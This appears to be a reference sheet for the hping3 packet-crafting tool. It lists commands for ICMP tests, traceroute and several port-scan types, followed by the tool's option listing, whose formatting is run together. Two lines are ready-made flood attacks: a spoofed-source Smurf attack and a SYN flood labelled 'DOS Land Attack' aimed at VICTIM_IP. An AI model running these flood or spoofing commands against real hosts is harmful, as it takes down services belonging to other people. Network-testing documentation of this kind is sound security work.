Test with Hping3
- Testing ICMP:
hping3 -1 test.com - Traceroute using ICMP:
hping3 --traceroute -V -1 test.com - Checking port:
hping3 -V -S -p 80 -s 5050 test.com - Traceroute to a determined port:
hping3 --traceroute -V -S -p 80 -s 5050 test.com - Other types of ICMP:
hping3 -c 1 -V -1 -C 17 test.com - Other types of Port Scanning:
hping3 -c 1 -V -p 80 -s 5050 -F test.com - Ack Scan:
hping3 -c 1 -V -p 80 -s 5050 -A test.com - Xmas Scan:
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF test.com - Null Scan:
hping3 -c 1 -V -p 80 -s 5050 -Y test.com - Smurf Attack:
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS - DOS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP --flood: sent packets as fast as possible. Don't show replies. --rand-dest: random destionation address mode. see the man. -V <-- Verbose -c --count: packet count -d --data: data size -S --syn: set SYN flag -w --win: winsize (default 64) -p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec -s --baseport: base source port (default random)
Hping3 how to use:
usage: hping3 host [options]
-h–help show this help-v–version show version-c–count packet count-i–interval wait (uX for X microseconds, for example -i u1000)--fastalias for -i u10000 (10 packets for second)--fasteralias for -i u1000 (100 packets for second)--floodsent packets as fast as possible. Don’t show replies.-n–numeric numeric output-q–quiet quiet-I–interface interface name (otherwise default routing interface)-V–verbose verbose mode-D–debug debugging info-z–bind bind ctrl+z to ttl (default to dst port)-Z–unbind unbind ctrl+z--beepbeep for every matching packet received
Mode (default mode TCP)
-0 --rawipRAW IP mode-1 --icmpICMP mode-2 --udpUDP mode-8 --scanSCAN mode.-9 --listenlisten mode
IP
-a --spoofspoof source address--rand-destrandom destionation address mode. see the man.--rand-sourcerandom source address mode. see the man.-t --ttlttl (default 64)-N --idid (default random)-W --winiduse win* id byte ordering-r --relrelativize id field (to estimate host traffic)-f --fragsplit packets in more frag. (may pass weak acl)-x --morefragset more fragments flag-y --dontfragset dont fragment flag-g --fragoffset the fragment offset-m --mtuset virtual mtu, implies –frag if packet size > mtu-o --tostype of service (default 0x00), try –tos help-G --rrouteincludes RECORD_ROUTE option and display the route buffer--lsrrloose source routing and record route--ssrrstrict source routing and record route-H --ipprotoset the IP protocol field, only in RAW IP mode
ICMP
-C --icmptypeicmp type (default echo request)-K --icmpcodeicmp code (default 0)--force-icmpsend all icmp types (default send only supported types)--icmp-gwset gateway address for ICMP redirect (default 0.0.0.0)--icmp-tsAlias for –icmp –icmptype 13 (ICMP timestamp)--icmp-addrAlias for –icmp –icmptype 17 (ICMP address subnet mask)--icmp-helpdisplay help for others icmp options
UDP/TCP
-s --baseportbase source port (default random)-p --destport[+][+]destination port(default 0) ctrl+z inc/dec -k --keepkeep still source port-w --winwinsize (default 64)-O --tcpoffset fake tcp data offset (instead of tcphdrlen / 4)-Q --seqnumshows only tcp sequence number-b --badcksum(try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you’ll get bad UDP/TCP checksum instead.-M --setseqset TCP sequence number-L --setackset TCP ack-F --finset FIN flag-S --synset SYN flag-R --rstset RST flag-P --pushset PUSH flag-A --ackset ACK flag-U --urgset URG flag-X --xmasset X unused flag (0x40)-Y --ymasset Y unused flag (0x80)--tcpexitcodeuse last tcp->th_flags as exit code--tcp-timestampenable the TCP timestamp option to guess the HZ/uptime
Common
-d --datadata size (default is 0)-E --filedata from file-e --signadd ‘signature’-j --dumpdump packets in hex-J --printdump printable characters-B --safeenable ‘safe’ protocol-u --endtell you when –file reached EOF and prevent rewind-T --traceroutetraceroute mode (implies –bind and –ttl 1)--tr-stopExit when receive the first not ICMP in traceroute mode--tr-keep-ttlKeep the source TTL fixed, useful to monitor just one hop--tr-no-rttDon’t calculate/show RTT information in traceroute mode
ARS packet description
--apd-sendSend the packet described with APD